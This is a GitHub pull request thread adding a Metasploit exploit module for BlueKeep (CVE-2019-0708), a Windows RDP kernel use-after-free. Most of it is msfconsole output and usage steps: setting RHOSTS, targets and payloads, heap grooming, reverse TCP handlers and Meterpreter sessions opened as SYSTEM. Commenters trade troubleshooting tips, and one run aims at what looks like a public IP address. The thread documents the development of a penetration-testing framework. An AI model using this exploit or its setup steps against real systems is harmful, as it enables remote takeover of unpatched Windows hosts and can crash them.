Add initial exploit for CVE-2019-0708, BlueKeep #12283

Merged
merged 53 commits into from Sep 23, 2019

Conversation

@bcook-r7 (Contributor) commented Sep 6, 2019

This PR adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

This module was originally developed by @zerosum0x0 and @ryhanson, then further moved along by @OJ, @zeroSteiner, @rickoates, @wvu-r7, @bwatters-r7, @wchen-r7, @tsellers-r7, @todb-r7 and others. The module was ported from a Python external module to a native Ruby module in order to take advantage of the RDP and other library enhancements in Metasploit. The original Python module is in the commit history if you wish to examine and compare it to the current implementation.

The module currently targets 64-bit versions of Windows 7 and Windows Server 2008 R2. For Windows Server 2008 R2, a registry entry needs to be modified to enable heap grooming via the RDPSND channel, though there remain other possibilities to explore for using alternate channels that are enabled by default on all Windows OSes.

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

There are specific targets for bare-metal, Virtualbox, VMware, and Hyper-V, though there may be additional variables in your target environment that additionally shift the base address for grooming, so we welcome any ideas from the community for automatically detecting this instead!

Todo

  • Fix error handling when licensing is incorrect

Optional Todo

  • Handle low-bandwidth networks more gracefully
  • Add detection for whether RDPSND channel-based grooming will work
  • Detect more OS specifics / obtain memory leak to determine Windows NPP start address
  • Write the XP/2003 portions grooming MS_T120.
  • Expand channels besides RDPSND/MS_T120 for grooming.

Verification

  • Start msfconsole
  • use exploit/rdp/cve_2019_0708_bluekeep_rce
  • set RHOSTS to target hosts (x64 Windows 7 or 2008 R2)
  • set PAYLOAD and associated options as desired
  • set TARGET to a more specific target based on your environment
  • Verify that you get a shell
  • Verify the target does not crash

Exploitation Sample Output

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.101:3389 - Surfing channels ...
[*] 192.168.56.101:3389 - Lobbing eggs ...
[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500
[*] Session 1 created in the background.
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.105:3389 - Surfing channels ...
[*] 192.168.56.105:3389 - Lobbing eggs ...
[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500
[*] Session 2 created in the background.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)

@bcoles (Contributor) commented Sep 6, 2019

To test, ensure you've copied all four .rb files from this PR, then restart msfconsole.

This PR includes changes to the core RDP library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

  • lib/msf/core/exploit/rdp.rb
  • modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  • modules/auxiliary/scanner/rdp/rdp_scanner.rb
  • modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

@bcoles (Contributor) commented Sep 6, 2019

I've tried this on Windows 2008 R2 Enterprise (x64) (2GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

Exploit failed, but the host didn't crash either.

Edit: Looks like it failed at the license packet step. Which makes sense, as the service was configured with no license, within the 120 day license grace period.

  • NLA disabled
  • HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Cannot reliably check exploitability.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Verifying RDP protocol...
[*] 172.16.191.198:3389 - Attempting to connect using TLS security
[*] 172.16.191.198:3389 - Sending erect domain request
[*] 172.16.191.198:3389 - Sending client info PDU
[*] 172.16.191.198:3389 - Received License packet
[*] 172.16.191.198:3389 - Sending client confirm active PDU
[*] 172.16.191.198:3389 - Sending client synchronize PDU
[*] 172.16.191.198:3389 - Sending client control cooperate PDU
[*] 172.16.191.198:3389 - Sending client control request control PDU
[-] 172.16.191.198:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

Windows 7 SP 1 Professional (x64) (4GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

  • set target 1 - fail. no shell. blue screen after repeated attempts.
  • set target 3 - always blue screen (SYSTEM_SERVICE_EXCEPTION, termdd.sys PAGE_FAULT_IN_NONPAGED_AREA)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[+] 172.16.191.130:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[*] 172.16.191.130:3389 - Verifying RDP protocol...
[*] 172.16.191.130:3389 - Attempting to connect using TLS security
[*] 172.16.191.130:3389 - Sending erect domain request
[*] 172.16.191.130:3389 - Sending client info PDU
[*] 172.16.191.130:3389 - Received License packet
[*] 172.16.191.130:3389 - Waiting for Server Demand packet
[*] 172.16.191.130:3389 - Received Server Demand packet
[*] 172.16.191.130:3389 - Sending client confirm active PDU
[*] 172.16.191.130:3389 - Sending client synchronize PDU
[*] 172.16.191.130:3389 - Sending client control cooperate PDU
[*] 172.16.191.130:3389 - Sending client control request control PDU
[*] 172.16.191.130:3389 - Sending client input sychronize PDU
[*] 172.16.191.130:3389 - Sending client font list PDU
[*] 172.16.191.130:3389 - Handling SERVER ANNOUNCE ...
[*] 172.16.191.130:3389 - Handling SERVER CAPABILITY ...
[*] 172.16.191.130:3389 - Handling CLIENT ID CONFIRM ...
[*] 172.16.191.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.16.191.130:3389 - Creating free trigger for user 13 on channel 1013
[*] 172.16.191.130:3389 - Surfing channels ...
[*] 172.16.191.130:3389 - Lobbing eggs ...
[*] 172.16.191.130:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

@busterb force-pushed the busterb:bluekeep branch from 7f194eb to edb7e20 (Sep 6, 2019)

@busterb (Member) commented Sep 6, 2019

Thanks @bcoles will take a look at the VMware target. We may be a bit over-broad in which VMWare product we're specifying there, though of course it would be nice to not need these specific targets at the risk of having a combinatorial target explosion.

@rockstardev commented Sep 6, 2019

Godspeed my friends... let's hope enough people patch their systems before pwning starts.

@zerosum0x0 (Contributor) commented Sep 6, 2019

@bcoles the different targets mostly have to do with hot-swap memory. When it's enabled, the NT kernel must allocate more PFN table PTE metadata structures before the actual start of the NPP.

If hot-swap memory is disabled (nominal) I would expect the default target to work. A full kernel crash dump is required for analysis though, the minidumps don't carry enough info forward.

@Zn00k commented Sep 6, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444 
[+] IP:3389  - The target is vulnerable.
[-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60>
Did you mean?  disconnect
[*] Exploit completed, but no session was created.

@422926799 commented Sep 6, 2019

Add cve_2019_0708_bluekeep_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/rdp/

Replace rdp.rb at /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

Replace rdp_scanner.rb at /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

Replace cve_2019_0708_bluekeep.rb at /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

@kevthehermit commented Sep 7, 2019

What is the easiest way to identify the Groombase for other targets - Looking at a Server 2008 R2 on AWS (Uploaded a vulnerable image that had been tested locally with VMware)

@MartinIngesen commented Sep 7, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444
[+] IP:3389 - The target is vulnerable.
[-] IP:3389 - Exploit failed: NameError undefined local variable or method `rdp_connect' for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60>
Did you mean? disconnect
[*] Exploit completed, but no session was created.

There were changes made to the core rdp library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

@xkkhh commented Sep 7, 2019 (marked as off-topic)

Why release this right before the 70th anniversary? Readers in China, see here: http://blog.xkkhh.cn/archives/535

@DoktorCranium commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

[*] Started reverse TCP handler on 192.168.11.9:4444
[*] 10.0.2.21:3389 - Detected RDP on 10.0.2.21:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 10.0.2.21:3389 - The target is vulnerable.
[*] 10.0.2.21:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 10.0.2.21:3389 - Surfing channels ...
[*] 10.0.2.21:3389 - Lobbing eggs ...
[*] 10.0.2.21:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

@jack-99 commented Sep 7, 2019

Why can't I find this exploit module even after updating msf?

@MartinIngesen commented Sep 7, 2019

I was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040).

@422926799 commented Sep 7, 2019

Why can't I find this exploit module even after updating msf?

You have to import the four .rb files yourself.

@linuxluyi commented Sep 7, 2019

Why release this right before the 70th anniversary? Readers in China, see here: http://blog.xkkhh.cn/archives/535

Has anyone tried this on a physical machine? If the registry is not modified, is it impossible to reproduce?

@jack-99 commented Sep 7, 2019

Add cve_2019_0708_bluekeep_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/rdp/
Replace rdp.rb at /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
Replace rdp_scanner.rb at /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
Replace cve_2019_0708_bluekeep.rb at /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

After I imported them successfully, I found that every attack causes a blue screen.

@422926799 commented Sep 7, 2019

After I imported them successfully, I found that every attack causes a blue screen.

2008 R2 needs the registry change, otherwise it will crash; see above.

@jack-99 commented Sep 7, 2019

2008 R2 needs the registry change, otherwise it will crash; see above.

I'm attacking Win7 SP1.

@422926799 commented Sep 7, 2019

I'm attacking Win7 SP1.

??? (confused)

@jack-99 commented Sep 7, 2019

??? (confused)

The target I'm attacking is Win7. Isn't Win7 affected too? But every attack causes a blue screen.

@422926799 commented Sep 7, 2019

The target I'm attacking is Win7. Isn't Win7 affected too? But every attack causes a blue screen.

A friend of mine has the same problem; it seems to be a target issue.

@evil0xxx commented Sep 7, 2019 (marked as resolved)

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.50.5
rhosts => 192.168.50.5
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 192.168.50.5:3389 - Detected RDP on 192.168.50.5:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.50.5:3389 - The target is vulnerable.
[+] 192.168.50.5:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.50.73:4444
[*] 192.168.50.5:3389 - Detected RDP on 192.168.50.5:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.50.5:3389 - The target is vulnerable.
[-] 192.168.50.5:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.

@busterb (Member) commented Sep 7, 2019

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

Thanks for the note @MartinIngesen. I was able to reproduce @bcoles's crash above with VMWare Fusion 11.

@busterb (Member) commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

@DoktorCranium VirtualBox 6.0.10 on Linux and Mac.

@adeljck commented Sep 7, 2019

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 154.8.170.33
rhosts => 154.8.170.33
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] 154.8.170.33:3389 - Cannot reliably check exploitability.
[-] 154.8.170.33:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.

Please give some help.

@Ghost-Assassin commented Sep 7, 2019 (marked as off-topic)

(screenshot of the error; image not included in this page)

Kali 2019.3 Latest MSF5 from apt
If the following file replaces the original file then reload_all, this error will occur.
cve_2019_0708_bluekeep.rb

@busterb (Member) commented Sep 23, 2019

Landing this module now, further improvements will come in new PRs. Thanks everyone for testing and notes!

bcook-r7 pushed a commit that referenced this pull request Sep 23, 2019
@bcook-r7 merged commit c0be631 into rapid7:master Sep 23, 2019

3 checks passed:
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

msjenkins-r7 added a commit that referenced this pull request Sep 23, 2019
@brandenjlynch commented Sep 27, 2019

I keep seeing this error: "Exploit failed: NameError uninitialized constant OpenSSL::SSL::TLS1_VERSION"

As far as I can tell all the code is up to date, just pulled it down via git. Any thoughts? OpenSSL should already be required, so..

@zeroSteiner (Member) commented Sep 27, 2019

@brandenjlynch I'd run into the same error. It was an issue with my environment, IIRC the OpenSSL gem hadn't installed correctly. I would suggest you verify your version of ruby is correct and then reinstall that gem. I believe it tries to compile from source so make sure you have the development headers available.

@brandenjlynch commented Sep 27, 2019

@zeroSteiner Thanks I'll try that!

@robertgov commented Sep 27, 2019

Has anyone succeeded with a physical machine? The VMware unpatched Win 7 worked with a little GROOMSIZE tweaking, but I can't even get to a blue screen on my other laptop in a lab test.

@busterb (Member) commented Sep 30, 2019

Release Notes

This adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

@tperry-r7 tperry-r7 added rn-modules and removed rn-modules labels Oct 1, 2019
@tdoan-r7 tdoan-r7 added hotness and removed docs hotness labels Oct 1, 2019
@terabytexr3 commented Oct 5, 2019

When I try it in Kali I have many problems, mostly with GROOMSIZE and Target.
But when I try the Windows version it works well. It's very easy.
https://youtu.be/SCsJ9Uq3POk

@qiushui-sir commented Oct 9, 2019

When I tested, I always had the following problem:
[*] Started reverse TCP handler on 192.168.1.119:4444
[*] 192.168.1.120:3389 - Detected RDP on 192.168.1.120:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.120:3389 - The target is vulnerable.
[*] 192.168.1.120:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.1.120:3389 - Surfing channels ...
[*] 192.168.1.120:3389 - Lobbing eggs ...
[-] 192.168.1.120:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
I set the target and RHOST.
My steps are the same as others, and even I have re-installed the system and Vmware several times.
What's wrong with me? What's wrong with me?

@wvu-r7 (Contributor) commented Oct 9, 2019

Nothing is wrong with you.

@qiushui-sir commented Oct 9, 2019

Nothing is wrong with you.

What should I do to get it to succeed?
Thank you.

@qiushui-sir commented Oct 9, 2019

I just tried 2008 again, the same problem.
[*] Started reverse TCP handler on 192.168.1.119:4444
[*] 192.168.1.122:3389 - Detected RDP on 192.168.1.122:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.122:3389 - The target is vulnerable.
[*] 192.168.1.122:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.1.122:3389 - Surfing channels ...
[*] 192.168.1.122:3389 - Lobbing eggs ...
[-] 192.168.1.122:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

@wvu-r7 (Contributor) commented Oct 9, 2019

What target did you select?

@qiushui-sir commented Oct 10, 2019

What target did you select?

I chose VMware, version 15.1.0.

@amagrupp commented Oct 11, 2019

I don't know what was changed, but in VirtualBox the exploit runs through but does not create a session, does not run exec, nothing.

What's the matter?

@amagrupp commented Oct 11, 2019

I don’t know what has been changed, but in the virtual box, the exploit works, but does not create a session, does not execute exec, nothing.

What's the matter ?

@wvu-r7 (Contributor) commented Oct 11, 2019

First of all, everyone needs to provide more details. Logs, screenshots, anything. Information about your setup. Version numbers. WinDbg sessions if you have to. The exploit's success is highly dependent on memory layout, specifically NPP base. It is impossible to provide support for this module without details. This is bug reporting 101.

Second of all, this is the pull request for the module, not a bug tracker. If you have bugs, please file them as issues. If you have support questions, ask on Slack, IRC, e-mail, or, if you're convinced GitHub is the place to be, ask via an issue. We will label it as question. This pull request is over.

Thank you.

@rapid7 rapid7 locked as resolved and limited conversation to collaborators Oct 11, 2019
@wvu-r7 (Contributor) commented Oct 11, 2019

Please read our CONTRIBUTING document. We would be happy to help everyone, just not here. Conversation on this PR is limited to development.

ETA: We've updated the document to clearly state where questions shouldn't go. Previously, it was stated where they should go and only implied where they shouldn't go. Thanks.
